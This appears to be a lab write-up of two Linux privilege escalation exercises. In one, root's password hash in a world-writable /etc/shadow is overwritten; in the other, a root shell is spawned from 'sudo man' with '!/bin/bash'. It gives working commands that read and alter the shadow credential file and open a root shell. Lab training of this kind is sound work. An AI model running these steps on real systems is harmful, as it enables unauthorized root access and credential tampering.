🔬Linux Privilege Escalation
Lab 1
Direct access to the target machine via
student
unprivileged userFind specific Linux Privilege escalation vulnerabilities manually
Some files permissions are not set properly, use them to elevate privileges.
Local Enumeration

Misconfigured Permissions Files
Look for world writable files
Find a file that could help to elevate privileges
find / -not -type l -perm -o+w

❗
/etc/shadow
is writable by everyone!
ls -l /etc/shadow
cat /etc/shadow
# "root" user doesn't have a password specified

Privilege Escalation
/etc/shadow
stores the passwords in an encrypted format, so theroot
password need to be replaced with a hashed password
# Generate a password entry
openssl passwd -1 -salt abc password123
$1$abc$UWUoROXzUCsLsVzI0R2et.
# Edit and paste the hashed password into the /etc/shadow file
vim /etc/shadow

Switch to the
root
user
su
# type "password123" password for "root" user
cd
ls
cat flag
Lab 2
Direct access to the target machine via
student
unprivileged userFind misconfigured
sudo
privileges
Local Enumeration

Misconfigured SUDO Privileges
Find
setuid
programs
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null

📌 Useful tool - FallOfSudo
Identify what commands the
student
user can run
sudo -l

❗
/usr/bin/man
binary can be run withSUDO
privileges, without providing aroot
user password
This can happen on Linux systems for specific binaries that other users have to run with
SUDO
privileges. It looks harmless, but it can allow users to spawn bash privileged sessions, since the specific binary can be utilized to execute specific commands. Those commands are executed with the binaryroot
privileges.
Privilege Escalation
sudo man ls
In the
man
scrolling page, using the!
abash
can be spawned
!/bin/bash
# "root" bash sessions is received

Retrieve the flag with the
root
user
Last updated
Was this helpful?